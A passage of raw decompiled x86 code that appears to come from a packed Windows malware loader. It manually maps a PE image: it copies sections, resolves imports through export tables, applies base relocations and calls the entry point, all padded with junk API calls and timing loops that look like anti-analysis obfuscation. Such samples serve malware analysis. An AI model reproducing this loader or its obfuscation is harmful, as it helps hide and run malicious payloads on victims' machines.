													_t735 = E6E808500(_t732, 0x6c);
													asm("xorps xmm1, xmm1");
													asm("cvtsd2ss xmm1, xmm0");
													do {
														asm("cvttss2si ecx, [ebp-0x34]");
														asm("mulss xmm1, [ebp-0x34]");
														asm("cvttss2si esi, xmm1");
														E6E7D57C0();
														E6E808500(_t735, _t735);
														asm("cdq");
														_t977 = _t977 + _t1026;
														asm("cvtsd2ss xmm0, xmm0");
														asm("adc eax, edx");
														asm("movss [ebp-0x34], xmm0");
														_t735 = E6E808500(_v28, _t977);
														asm("xorps xmm1, xmm1");
														asm("cvtsd2ss xmm1, xmm0");
														asm("movd xmm0, esi");
														asm("cvtdq2ps xmm0, xmm0");
														asm("mulss xmm0, [ebp-0x34]");
														asm("subss xmm0, xmm1");
														asm("cvttss2si eax, xmm0");
														_v40 = _t735;
														_v29 = _t735;
														__eflags = _t735 - 0xd;
													} while (_t735 >= 0xd);
													goto L71;
												} else {
													goto L65;
												}
												do {
													L65:
													asm("movaps xmm0, xmm1");
													asm("mulsd xmm0, xmm1");
													asm("cvttsd2si eax, xmm0");
													asm("movaps xmm1, xmm0");
													__eflags = _t727 - 9;
												} while (_t727 < 9);
												goto L66;
											}
											_v48 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
											_t514 = _v84 + 0xffff;
											_v84 = _t514;
											goto L75;
										}
										_t743 = _v36 + _v36;
										__eflags = _t743 - _v52;
										if(_t743 < _v52) {
											do {
												__eflags = _t929 - 0x7d;
												if(_t929 <= 0x7d) {
													L98:
													__eflags = _t929 - 0x6c;
													if(_t929 != 0x6c) {
														GetDialogBaseUnits();
													}
													_v29 = 0x36;
													_v41 = 0x33;
													do {
														GetOEMCP();
														_t745 = E6E7D5ED0(_v29, _t929);
														_v85 = _t745;
														E6E7D57C0();
														_v29 = _t745;
														_t746 = E6E7D5ED0(_v41, _t929);
														_t933 = _t746;
														_v64 = _t746;
														_t743 = _v85;
														_v41 = _t933;
														_t929 = _v29 * _t743 - _t933;
														__eflags = _t929 - 0xd;
													} while (_t929 < 0xd);
													goto L102;
												}
												_v29 = 0x78;
												do {
													E6E7D57C0();
													_t1029 = _t743;
													asm("cdq");
													_t902 = E6E7D5780(_t1029, _t1029, _t929);
													_t1033 = _t1033 + 8;
													_v29 = _t902;
													asm("cdq");
													_t743 = _t1029 / (_v29 + _t743) - _t902;
													_t929 = _t743;
													__eflags = _t929 - 0x7d;
												} while (_t929 > 0x7d);
												goto L98;
												L102:
												__eflags = _t929 - 0x3e;
												if(_t929 < 0x3e) {
													_t753 = GetForegroundWindow();
													asm("movss xmm0, [0x6e8186c8]");
													_t743 = E6E7D5990(_t929, E6E8081CE(_t753), _t929);
													_t1033 = _t1033 + 8;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("addss xmm0, [0x6e81865c]");
													asm("cvttss2si edx, xmm0");
												}
												__eflags = _t929 - 0x4c;
											} while (_t929 == 0x4c);
											L106:
											GetACP();
											goto L106;
										}
										_v148 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
										_t514 = _v84 + 0xffff;
										_v84 = _t514;
										goto L75;
									}
									__eflags = _v36 + 4 - _v52;
									if(_v36 + 4 <= _v52) {
										while(1) {
											__eflags = _t929 - 6;
											if(_t929 != 6) {
												goto L86;
											}
											L85:
											GetCapture();
											L87:
											_t1030 = E6E7D5ED0(0x49, _t929);
											_v64 = _t1030;
											_t767 = E6E7D5780(_t766, 0x49, 0);
											_t1033 = _t1033 + 8;
											asm("cdq");
											_v28 = _t767;
											asm("cdq");
											_t929 = _t1030 - E6E807C80(_t1030, _t929, _v28, _t929) + _v28;
											__eflags = _t929;
											L88:
											__eflags = _t929 - 5;
											if(_t929 < 5) {
												_t763 = E6E7D5780(InSendMessage(), 0x39, 0);
												_t1033 = _t1033 + 8;
												_v64 = _t763;
												E6E7D57C0();
												asm("xorps xmm0, xmm0");
												_t929 = _t763 + _v64;
												asm("movss [ebp-0x18], xmm0");
												__eflags = _t929 - 6;
												if(_t929 != 6) {
													goto L86;
												} else {
													goto L91;
												}
												do {
													L91:
													GetCurrentThreadId();
													asm("movss xmm0, [ebp-0x18]");
													asm("addss xmm0, xmm0");
													asm("cvttss2si edx, xmm0");
													asm("movss [ebp-0x18], xmm0");
													__eflags = _t929 - 6;
												} while (_t929 == 6);
												while(1) {
													__eflags = _t929 - 6;
													if(_t929 != 6) {
														goto L86;
													}
													goto L85;
												}
											}
											GetThreadLocale();
											_t929 = 0;
											continue;
											L86:
											__eflags = _t929 - 0xf;
											if(_t929 > 0xf) {
												goto L88;
											}
											goto L87;
										}
									}
									_v144 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
									_t514 = _v84 + 0xffff;
									_v84 = _t514;
									goto L75;
								}
								__eflags = _t1026 - 0x7c0dfcaa;
								if(_t1026 == 0x7c0dfcaa) {
									goto L54;
								}
								__eflags = _t1026 - 0x91afca54;
								if(_t1026 != 0x91afca54) {
									_t514 = _v84;
									goto L75;
								}
								goto L54;
							}
							goto L111;
						}
						asm("movsd xmm0, [0x6e818588]");
						_t987 = 1;
						asm("movsd [ebp-0x84], xmm0");
						asm("movsd [ebp-0x40], xmm0");
						do {
							__imp__GetTickCount64();
							asm("movsd xmm0, [ebp-0x40]");
							asm("subsd xmm0, [0x6e818580]");
							asm("mulsd xmm0, [ebp-0xa8]");
							asm("addsd xmm0, [ebp-0x7c]");
							asm("movsd [ebp-0x40], xmm0");
							_t514 = E6E8084C0(E6E807870(_t514, _t909, 0x2710, 0), _t515, _t909);
							asm("movsd xmm1, [ebp-0x40]");
							_t987 = _t987 + 1;
							__eflags = _t987;
							asm("mulsd xmm1, xmm0");
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("mulsd xmm1, [0x6e818568]");
							asm("movsd [ebp-0x40], xmm0");
							asm("addsd xmm1, [ebp-0x64]");
							asm("movsd [ebp-0x64], xmm1");
							asm("movsd xmm1, [ebp-0xb8]");
							asm("comisd xmm1, xmm0");
						} while (_t987 >= 0);
						_t910 = _v36;
						_t796 = _t910;
						_t988 = _v52;
						_v28 = _t910;
						__eflags = _t910 - _t988;
						if(_t910 <= _t988) {
							L144:
							_t946 = _v72;
							_t989 = _v92;
							L145:
							_t797 = _v76;
							L146:
							_v76 = _t797 - 1;
							__eflags = _t797;
							if(_t797 == 0) {
								asm("movsd xmm0, [0x6e818668]");
								_t990 = 1;
								_t947 = __imp__GetTickCount64;
								asm("movsd [ebp-0x98], xmm0");
								asm("movsd [ebp-0xd8], xmm0");
								asm("movsd xmm0, [0x6e818588]");
								asm("movsd [ebp-0x40], xmm0");
								do {
									_t517 =  *_t947();
									asm("movsd xmm0, [ebp-0x40]");
									asm("mulsd xmm0, [ebp-0xa8]");
									asm("addsd xmm0, [ebp-0x7c]");
									asm("movsd [ebp-0x40], xmm0");
									E6E8084C0(E6E807870(_t517, _t910, 0x2710, 0), _t518, _t910);
									asm("movsd xmm1, [ebp-0x40]");
									_t990 = _t990 + 1;
									__eflags = _t990;
									asm("mulsd xmm1, xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("mulsd xmm1, [0x6e818558]");
									asm("movsd [ebp-0x40], xmm0");
									asm("addsd xmm1, [ebp-0x64]");
									asm("movsd [ebp-0x64], xmm1");
									asm("movsd xmm1, [0x6e818668]");
									asm("comisd xmm1, xmm0");
								} while (_t990 >= 0);
								__eflags = _v36 - _v52;
								if(_v36 == _v52) {
									asm("movsd xmm0, [0x6e818628]");
									_t800 = _v40;
									asm("movsd [ebp-0x98], xmm0");
									__eflags = _v40 - 0x13;
									if(_v40 != 0x13) {
										L273:
										CreateMenu();
										goto L273;
									} else {
										goto L272;
									}
									do {
										L272:
										asm("cvttsd2si ecx, xmm0");
										_t800 = E6E7D5ED0(_t800, _t910);
										_t523 = E6E808500(_t522, _t522);
										asm("cvtsd2ss xmm0, xmm0");
										asm("xorps xmm1, xmm1");
										asm("cvtss2sd xmm1, xmm0");
										asm("movaps xmm0, xmm1");
										asm("mulsd xmm0, [ebp-0x98]");
										asm("divsd xmm1, xmm0");
										asm("movsd [ebp-0x98], xmm0");
										asm("cvttsd2si eax, xmm1");
										__eflags = _t523 - 0x13;
									} while (_t523 == 0x13);
									goto L273;
								}
								_t524 =  *_t947();
								__imp__GetTickCount64();
								E6E8084C0(E6E807870(_t524, _t910, 0x2710, 0), _t525, _t910);
								asm("mulsd xmm0, [ebp-0xb0]");
								asm("movsd [ebp-0x64], xmm0");
								E6E8084C0(E6E807870(_t524, _t910, 0x2710, 0), _t527, _t910);
								asm("mulsd xmm0, [ebp-0x7c]");
								_t803 = _v116;
								asm("movsd xmm1, [ebp-0x64]");
								asm("addsd xmm1, xmm0");
								_t949 =  *(_t803 + 6) & 0x0000ffff;
								_t993 = _t803 + 0x18 + ( *(_t803 + 0x14) & 0x0000ffff);
								_t530 = _v56;
								asm("mulsd xmm1, [ebp-0xa8]");
								asm("divsd xmm1, [0x6e818598]");
								asm("movsd [ebp-0x64], xmm1");
								while(1) {
									_v60 = _t530;
									_t531 = _t949;
									_t949 = _t949 - 1;
									_v108 = _t993;
									_v76 = _t993;
									__eflags = _t531;
									if(_t531 == 0) {
										break;
									}
									_t848 = _v36;
									__eflags = _t848 - _v140;
									_t635 =  >  ? _t848 : _v112;
									_t910 =  *((intOrPtr*)(_t993 + 0x14)) + _v92;
									_t849 =  >  ? _t848 : _v112;
									_t636 =  *(_t993 + 0x10);
									_v36 =  >  ? _t848 : _v112;
									_t851 =  *((intOrPtr*)(_t993 + 0xc)) + _v80;
									_v60 = _t636;
									__eflags = _t636;
									if(_t636 == 0) {
										L158:
										_t530 = _t636 - 1;
										_v8 = 0xffffffff;
										_v56 = _t530;
										_t993 = _t993 + 0x28;
										continue;
									}
									_t1015 = _t636;
									do {
										_t637 =  *_t910;
										_t910 = _t910 + 1;
										 *_t851 = _t637;
										_t851 = _t851 + 1;
										_t1015 = _t1015 - 1;
										__eflags = _t1015;
									} while (_t1015 != 0);
									_v60 = _t1015;
									_t993 = _v76;
									_t636 = _v60;
									goto L158;
								}
								asm("movsd xmm0, [0x6e818588]");
								_t994 = 1;
								asm("movsd [ebp-0x40], xmm0");
								do {
									__imp__GetTickCount64();
									asm("movsd xmm0, [ebp-0x40]");
									asm("subsd xmm0, [0x6e818580]");
									asm("mulsd xmm0, [ebp-0xa8]");
									asm("addsd xmm0, [ebp-0x7c]");
									asm("movsd [ebp-0x40], xmm0");
									_t531 = E6E8084C0(E6E807870(_t531, _t910, 0x2710, 0), _t532, _t910);
									asm("mulsd xmm0, [ebp-0x40]");
									_t994 = _t994 + 1;
									__eflags = _t994;
									asm("movsd xmm1, [ebp-0xb8]");
									asm("mulsd xmm0, [0x6e818568]");
									asm("addsd xmm0, [ebp-0x64]");
									asm("movsd [ebp-0x64], xmm0");
									asm("movsd [ebp-0xc0], xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("comisd xmm1, xmm0");
									asm("movsd [ebp-0x40], xmm0");
								} while (_t994 >= 0);
								_t805 = _v40;
								while(1) {
									asm("cdq");
									_t535 = _v36 - _t910 >> 1;
									__eflags = _t535 - _v52;
									if(_t535 >= _v52) {
										break;
									}
									__eflags = _t805 - 0x3f;
									if(_t805 != 0x3f) {
										__imp__GetShellWindow();
										E6E7D57C0();
										E6E7D57C0();
										_t847 = _t535;
										_t545 = _t535;
										asm("cdq");
										__eflags = _t545 % _t847;
										_t535 = _t545 / _t847;
										_t805 = _t535;
									}
									asm("movsd xmm0, [0x6e818610]");
									asm("movsd [ebp-0xb8], xmm0");
									__eflags = _t805 - 0x12;
									if(_t805 < 0x12) {
										L261:
										__eflags = _t805 - 0x62;
										if(_t805 <= 0x62) {
											E6E7D57C0();
										} else {
											E6E7D5780(_t535, 0x54, 0);
											_t1033 = _t1033 + 8;
										}
										asm("movss xmm0, [0x6e818660]");
										asm("movss [ebp-0x2c], xmm0");
										do {
											_t536 = GetLogicalDrives();
											asm("movss xmm0, [ebp-0x2c]");
											asm("divss xmm0, xmm0");
											asm("cvttss2si eax, xmm0");
											asm("movss [ebp-0x2c], xmm0");
											__eflags = _t536 - 0x6b;
										} while (_t536 <= 0x6b);
										__eflags = _t536 - 0x49;
										if(_t536 > 0x49) {
											E6E7D57C0();
										}
										asm("movss xmm0, [0x6e818658]");
										_t910 = 0;
										asm("movss [ebp-0x58], xmm0");
										_t478 = _t910 + 8; // 0x8
										_t807 = _t478;
										E6E808500(_t536, _t478);
										asm("cvtsd2ss xmm0, xmm0");
										asm("movss [ebp-0x2c], xmm0");
										do {
											__imp__GetThreadErrorMode();
											asm("cvttss2si ecx, [ebp-0x58]");
											_t539 = E6E808500(E6E7D5ED0(_t807, 0), _t538);
											asm("xorps xmm1, xmm1");
											asm("cvtsd2ss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x2c]");
											asm("subss xmm0, [ebp-0x58]");
											asm("movss [ebp-0x60], xmm1");
											asm("movss [ebp-0x58], xmm0");
											asm("movaps xmm0, xmm1");
											asm("addss xmm0, [ebp-0x2c]");
											_t807 = E6E8081CE(_t539);
											E6E808500(_t540, _t807);
											asm("xorps xmm1, xmm1");
											asm("cvtsd2ss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x58]");
											asm("divss xmm0, xmm1");
											asm("movss [ebp-0x2c], xmm1");
											asm("movss xmm1, [ebp-0x60]");
											asm("subss xmm1, xmm0");
											asm("cvttss2si ecx, xmm1");
											_v40 = _t807;
											_v29 = _t807;
											__eflags = _t807 - 0x28;
										} while (_t807 < 0x28);
										continue;
									} else {
										asm("movsd xmm0, [0x6e818638]");
										_t1013 = 0x2e;
										asm("movsd [ebp-0xb0], xmm0");
										do {
											__imp__InitNetworkAddressControl();
											asm("movsd xmm1, [ebp-0xb8]");
											asm("movaps xmm0, xmm1");
											asm("subsd xmm0, [ebp-0xb0]");
											asm("cvttsd2si eax, xmm0");
											_t805 = _t535;
											asm("cdq");
											asm("movd xmm0, ecx");
											asm("cvtdq2pd xmm0, xmm0");
											_t1013 = _t805 / _t1013;
											_t535 = _t1013 + _t805;
											asm("mulsd xmm1, xmm0");
											asm("movsd [ebp-0xb0], xmm0");
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("movsd [ebp-0xb8], xmm1");
											asm("addsd xmm0, xmm1");
											asm("cvttsd2si ecx, xmm0");
											__eflags = _t805 - 0x12;
										} while (_t805 >= 0x12);
										goto L261;
									}
								}
								_t951 = _v80;
								_t547 = _v116 - 0xffffff80;
								_v28 = _t547;
								_v120 = _t547;
								_t996 =  *_t547 + _t951;
								_v72 = _t996;
								_v92 = _t996;
								asm("o16 nop [eax+eax]");
								while(1) {
									_t913 =  *(_t996 + 0xc);
									__eflags = _t913;
									if(_t913 == 0) {
										break;
									}
									__eflags =  *_t547;
									if( *_t547 == 0) {
										break;
									}
									__eflags = _v36 + _v36 - _v140;
									_v8 = 8;
									_t835 =  >=  ? _v36 : _v112;
									_t588 =  >=  ? _v36 : _v112;
									_v36 = _t588;
									_v64 = _t588;
									_t921 = _v144(_t913 + _t951);
									_t960 =  *_t996 + _v80;
									_t1008 =  *((intOrPtr*)(_t996 + 0x10)) + _v80;
									_t836 = _v40;
									_t591 = _v36;
									_v164 = _t921;
									_v56 = _t960;
									_v108 = _t1008;
									_v8 = 0xffffffff;
									__eflags =  *_t1008;
									_v60 = _t960;
									_v84 = _t921;
									_v76 = _t1008;
									if( *_t1008 == 0) {
										L188:
										_t592 = _v52;
										__eflags = _v36 - _v52;
										if(_v36 == _v52) {
											asm("movss xmm1, [0x6e818678]");
											do {
												asm("movaps xmm0, xmm1");
												_t592 = E6E7D5780(E6E8081CE(_t592), _t593, 0);
												_t1033 = _t1033 + 8;
												asm("movd xmm1, eax");
												asm("cvtdq2ps xmm1, xmm1");
												asm("movaps xmm0, xmm1");
												asm("addss xmm0, [0x6e818548]");
												asm("cvttss2si eax, xmm0");
												_v40 = _t592;
												_v29 = _t592;
												__eflags = _t592 - 0x61;
											} while (_t592 != 0x61);
											_t996 = _v72;
											_t547 = _v28;
											_t951 = _v80;
											continue;
										}
										_t547 = _v28;
										_t996 = _v72 + 0x14;
										_t951 = _v80;
										_v72 = _t996;
										_v92 = _t996;
										continue;
									} else {
										do {
											__eflags = _t960;
											if(_t960 == 0) {
												L191:
												_t961 = _v60;
												_t595 = _t591 + _t591;
												__eflags = _t595 - _v52;
												if(_t595 < _v52) {
													__eflags = _t836 - 0x71;
													if(_t836 <= 0x71) {
														_t623 = GetProcessWindowStation();
														asm("movsd xmm0, [0x6e818618]");
														E6E7D5990(_t921, E6E8083AF(_t623), _t921);
														_t1033 = _t1033 + 8;
														asm("movd xmm0, esi");
														asm("cvtdq2pd xmm0, xmm0");
														asm("cvttsd2si ecx, xmm0");
														_t627 = E6E808500(E6E7D5ED0(_t836, _t921), _t626);
														asm("cvtsd2ss xmm0, xmm0");
														asm("cvtss2sd xmm0, xmm0");
														asm("movsd [ebp-0xd0], xmm0");
														_t628 = E6E808500(_t627, 0x7f);
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, [0x6e8186cc]");
														_t836 = E6E8081CE(_t628);
														_t595 = E6E808500(_t629, _t836);
														asm("movd xmm1, esi");
														_t1008 = _v76;
														asm("cvtdq2pd xmm1, xmm1");
														asm("addsd xmm0, xmm1");
														asm("movsd xmm1, [ebp-0xd0]");
														asm("addsd xmm1, xmm0");
														asm("cvttsd2si ecx, xmm1");
													}
													asm("movsd xmm0, [0x6e8185f8]");
													__eflags = _t836 - 0x6b;
													if(_t836 > 0x6b) {
														L197:
														__eflags = _t836 - 0x26;
														if(_t836 >= 0x26) {
															__imp__UnregisterApplicationRecoveryCallback();
														}
														asm("movsd xmm0, [0x6e818608]");
														E6E7D5780(E6E8083AF(_t595), _t596, 0);
														_t1033 = _t1033 + 8;
														_t921 = _v84;
														asm("movd xmm1, eax");
														asm("cvtdq2pd xmm1, xmm1");
														asm("movaps xmm0, xmm1");
														asm("subsd xmm0, [0x6e818630]");
														asm("subsd xmm1, xmm0");
														asm("cvttsd2si ecx, xmm1");
														_v40 = _t836;
														_v29 = _t836;
														goto L187;
													} else {
														do {
															asm("cvttsd2si ecx, xmm0");
															E6E7D57C0();
															_t836 = _t595;
															_t595 = E6E808500(_t595, _t836);
															asm("cvttsd2si ecx, xmm0");
															__eflags = _t836 - 0x6b;
														} while (_t836 <= 0x6b);
														goto L197;
													}
												}
												_t631 = _v80 +  *_t1008;
												_v28 = _t631;
												_v120 = _t631;
												_t633 = _v148(_t921, _t631 + 2);
												_t836 = _v40;
												_t921 = _v84;
												 *_t1008 = _t633;
												goto L187;
											}
											__eflags =  *_t960;
											if( *_t960 >= 0) {
												goto L191;
											}
											_t921 = _v84;
											_t962 = _t591;
											_v56 = _t591;
											__eflags = _t962 - _v52;
											if(_t962 <= _v52) {
												L186:
												_t961 = _v60;
												goto L187;
											}
											asm("cdq");
											_t601 = _t591 - _t921;
											__eflags = _t601;
											_t602 = _t601 >> 1;
											_v100 = _t602;
											while(1) {
												_t1011 = _t962;
												_v108 = _t1011;
												__eflags = _t602 - _v52;
												if(_t602 >= _v52) {
													break;
												}
												asm("movss xmm0, [0x6e8186b0]");
												asm("movss [ebp-0x2c], xmm0");
												__eflags = _t836 - 0x3d;
												if(_t836 != 0x3d) {
													L175:
													_t609 = 0x72;
													__eflags = _t836 - 0x1c;
													if(_t836 < 0x1c) {
														L178:
														_v96 = 0;
														_t963 = 0x33;
														__eflags = _t836 - 0x3c;
														if(_t836 == 0x3c) {
															L181:
															asm("xorps xmm2, xmm2");
															__eflags = _t836 - 0x1c;
															if(_t836 < 0x1c) {
																L184:
																_t602 = _v100;
																_t962 = _v56 + 1;
																_v56 = _t962;
																__eflags = _t1011 - _v112;
																if(_t1011 >= _v112) {
																	continue;
																}
																_t1008 = _v76;
																_t921 = _v84;
																goto L186;
															}
															asm("xorps xmm0, xmm0");
															do {
																asm("movaps xmm1, xmm0");
																asm("cvtps2pd xmm0, xmm2");
																asm("mulsd xmm0, xmm1");
																asm("cvtpd2ps xmm2, xmm0");
																asm("cvtps2pd xmm0, xmm2");
																asm("mulsd xmm0, xmm1");
																asm("cvttsd2si ecx, xmm0");
																_v40 = _t836;
																_v29 = _t836;
																__eflags = _t836 - 0x1c;
															} while (_t836 >= 0x1c);
															goto L184;
														} else {
															goto L179;
														}
														do {
															L179:
															asm("cdq");
															_t613 = E6E808500(E6E807C80(0x14, _t921, _t963, _v96), _t612);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movd xmm0, esi");
															asm("cvtdq2ps xmm0, xmm0");
															asm("movss [ebp-0x3c], xmm1");
															asm("divss xmm1, xmm0");
															_t841 = (_v96 << 0x00000020 | _t963) << 1;
															asm("cvttss2si eax, xmm1");
															_t963 = _t963 + _t963;
															_v96 = _t841;
															_v48 = _t613;
															asm("cdq");
															_t836 = E6E807C80(0x14, _t921, _t963, _t841);
															E6E808500(_t615, _t836);
															asm("movss xmm1, [ebp-0x3c]");
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm1, xmm0");
															asm("cvttss2si ecx, xmm1");
															_v40 = _t836;
															_v29 = _t836;
															__eflags = _t836 - 0x3c;
														} while (_t836 != 0x3c);
														_t1011 = _v108;
														goto L181;
													}
													asm("o16 nop [eax+eax]");
													do {
														_t609 = _t609 + _t609;
														_t836 = _t609;
														_v40 = _t836;
														_v29 = _t836;
														__eflags = _t609 - 0x1c;
													} while (_t609 >= 0x1c);
													goto L178;
												} else {
													goto L174;
												}
												do {
													L174:
													_t618 = GetDesktopWindow();
													asm("movss xmm0, [ebp-0x2c]");
													_t620 = E6E7D5990(_t921, E6E8081CE(_t618), _t921);
													_t1033 = _t1033 + 8;
													asm("movd xmm1, eax");
													asm("cvtdq2ps xmm1, xmm1");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x2c], xmm1");
													asm("divss xmm0, xmm1");
													asm("cvttss2si eax, xmm0");
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("subss xmm1, xmm0");
													asm("cvttss2si eax, xmm1");
													_t836 = _t620;
													_v40 = _t836;
													_v29 = _t836;
													__eflags = _t836 - 0x3d;
												} while (_t836 == 0x3d);
												goto L175;
											}
											_t921 = _v84;
											_t961 = _v60;
											_t1008 = _v76;
											_t836 = _v40;
											 *_t1008 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t921 + 0x3c)) + _t921 + 0x78)) + _t921 + 0x1c)) + (( *_t961 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t921 + 0x3c)) + _t921 + 0x78)) + _t921 + 0x10))) * 4 + _t921)) + _t921;
											L187:
											_t1008 =  &(_t1008[1]);
											__eflags = _t961;
											_v76 = _t1008;
											_v108 = _t1008;
											_t600 =  ==  ? _t961 : _t961 + 4;
											__eflags =  *_t1008;
											_t960 =  ==  ? _t961 : _t961 + 4;
											_t591 = _v36;
											_v60 = _t960;
											_v56 = _t960;
										} while ( *_t1008 != 0);
										goto L188;
									}
								}
								asm("movsd xmm0, [0x6e818588]");
								_t997 = 1;
								_t952 = __imp__GetTickCount64;
								asm("movsd [ebp-0xc8], xmm0");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("movsd [ebp-0x40], xmm0");
								do {
									E6E8084C0(E6E807870( *_t952(), _t913, 0x2710, 0), _t549, _t913);
									asm("movsd xmm1, [ebp-0xc8]");
									_t997 = _t997 + 1;
									__eflags = _t997;
									asm("mulsd xmm1, [ebp-0xa8]");
									asm("addsd xmm1, [ebp-0x7c]");
									asm("mulsd xmm0, xmm1");
									asm("movsd xmm1, [0x6e818668]");
									asm("mulsd xmm0, [0x6e818558]");
									asm("addsd xmm0, [ebp-0x40]");
									asm("movsd [ebp-0x40], xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("comisd xmm1, xmm0");
									asm("movsd [ebp-0xc8], xmm0");
								} while (_t997 >= 0);
								_t551 = _v36;
								_t810 = _v52;
								_t953 = _v80;
								__eflags = _t551 - _t810;
								if(_t551 != _t810) {
									_t914 = _v116;
									_t998 = _t914 + 0xa0;
									_t954 = _t953 -  *((intOrPtr*)(_t914 + 0x34));
									__eflags =  *(_t998 + 4);
									if( *(_t998 + 4) == 0) {
										L235:
										_t999 = 1;
										do {
											__imp__GetTickCount64();
											_t551 = E6E8084C0(E6E807870(_t551, _t914, 0x2710, 0), _t552, _t914);
											asm("movsd xmm1, [ebp-0x84]");
											_t999 = _t999 + 1;
											__eflags = _t999;
											asm("mulsd xmm1, [ebp-0xa8]");
											asm("addsd xmm1, [ebp-0x7c]");
											asm("mulsd xmm0, xmm1");
											asm("movsd xmm1, [ebp-0x98]");
											asm("mulsd xmm0, [0x6e818558]");
											asm("addsd xmm0, [ebp-0x40]");
											asm("movsd [ebp-0x40], xmm0");
											asm("movd xmm0, esi");
											asm("cvtdq2pd xmm0, xmm0");
											asm("comisd xmm1, xmm0");
											asm("movsd [ebp-0x84], xmm0");
										} while (_t999 >= 0);
										__eflags = _v36 + 4 - _v52;
										if(_v36 + 4 > _v52) {
											_t955 = _v80;
											 *0x6e820484 = _t955;
											_t1002 =  *((intOrPtr*)(_v116 + 0x28)) + _t955;
											__eflags = _v276;
											if(_v276 != 0) {
												_t555 =  *_t1002(_v244, 1, 0); // executed
												L255:
												asm("movsd xmm0, [ebp-0x40]");
												E6E808391(_t555);
												L253:
												 *[fs:0x0] = _v16;
												__eflags = _v24 ^ _t1031;
												return E6E7E440A(_v24 ^ _t1031);
											}
											_t555 = E6E7D6360(_t955, _v272);
											_v100 = _t555;
											__eflags = _t555;
											if(_t555 == 0) {
												goto L255;
											}
											__eflags = _v248;
											if(_v248 == 0) {
												_t957 = _v244;
											} else {
												_t957 = _v244;
												E6E7D6320(_t957, _t955);
											}
											 *_t1002(_t957, 1, 0);
											_v100(_v264, _v260, _v256, _v252);
											goto L253;
										}
										_t562 = _v40;
										asm("o16 nop [eax+eax]");
										while(1) {
											L239:
											asm("movsd xmm1, [0x6e8185c8]");
											_t958 = 0;
											_t1004 = 0x5d;
											__eflags = _t562 - 2;
											if(_t562 < 2) {
												continue;
											} else {
												goto L240;
											}
											do {
												L240:
												asm("movaps xmm0, xmm1");
												asm("addsd xmm0, xmm1");
												asm("movsd [ebp-0x98], xmm0");
												_t563 = E6E7D5780(_t562, _t1004, _t958);
												_t1033 = _t1033 + 8;
												asm("cdq");
												_t1004 = _t563;
												_t958 = _t914;
												_t562 = E6E808500(_t563, _t563);
												asm("movsd xmm1, [ebp-0x98]");
												asm("divsd xmm1, xmm0");
												asm("cvttsd2si eax, xmm1");
												asm("movsd xmm1, [ebp-0x98]");
												__eflags = _t562 - 2;
											} while (_t562 >= 2);
											do {
												goto L239;
											} while (_t562 < 2);
											goto L240;
											L239:
											asm("movsd xmm1, [0x6e8185c8]");
											_t958 = 0;
											_t1004 = 0x5d;
											__eflags = _t562 - 2;
										}
									}
									__eflags = _t551 - _t810;
									if(_t551 < _t810) {
										__eflags = _v40 - 0x4d;
										if(_v40 != 0x4d) {
											E6E7D5ED0(0x30, _t914);
										} else {
											_t582 = GetDesktopWindow();
											E6E7D57C0();
											asm("movss xmm0, [0x6e8186a0]");
											E6E7D5990(_t914, E6E8081CE(_t582), _t914);
											_t1033 = _t1033 + 8;
										}
										__imp__GetUserDefaultUILanguage();
										_v40 = 0xfffffff1;
										_t567 = _v72;
									} else {
										_t567 =  *_t998 + _v80;
										_v72 = _t567;
									}
									_t821 = _t567 + 4;
									_t551 =  *_t821;
									_v28 = _t821;
									__eflags = _t551;
									if(_t551 != 0) {
										_t914 = _v76;
										do {
											__eflags = _v36 - _v52;
											_t823 = _v28;
											if(_v36 > _v52) {
												_t998 = _t551 - 8 >> 1;
												_t914 =  *_v72 + _v80;
												_t581 = _v72 + 8;
												__eflags = _t581;
												_v60 = _t581;
											}
											__eflags = _t998;
											if(_t998 != 0) {
												_t571 = _v36 + _v36;
												__eflags = _t571;
												_v100 = _t571;
												while(1) {
													_t998 = _t998 - 1;
													__eflags = _t571 - _v52;
													if(_t571 < _v52) {
														break;
													}
													_t576 =  *_v60 & 0x0000ffff;
													_t828 = _t576;
													_t577 = _t576 >> 0xc;
													__eflags = _t577 - 0xa;
													if(_t577 != 0xa) {
														__eflags = _t577 - 3;
														if(_t577 != 3) {
															__eflags = _t577 - 1;
															if(_t577 != 1) {
																__eflags = _t577 - 2;
																if(_t577 == 2) {
																	_t829 = _t828 & 0x00000fff;
																	_t436 = _t829 + _t914;
																	 *_t436 =  *(_t829 + _t914) + _t954;
																	__eflags =  *_t436;
																}
															} else {
																 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + (_t954 >> 0x10);
															}
														} else {
															 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + _t954;
														}
													} else {
														 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + _t954;
													}
													_v60 = _v60 + 2;
													_t571 = _v100;
													__eflags = _t998;
													if(_t998 != 0) {
														continue;
													} else {
														_t823 = _v28;
														goto L232;
													}
												}
												_t572 = _v40;
												while(1) {
													L243:
													__eflags = _t572 - 4;
													if(_t572 >= 4) {
														break;
													}
													_t572 = 0xa4;
												}
												__eflags = _t572 - 0x2c;
												if(_t572 > 0x2c) {
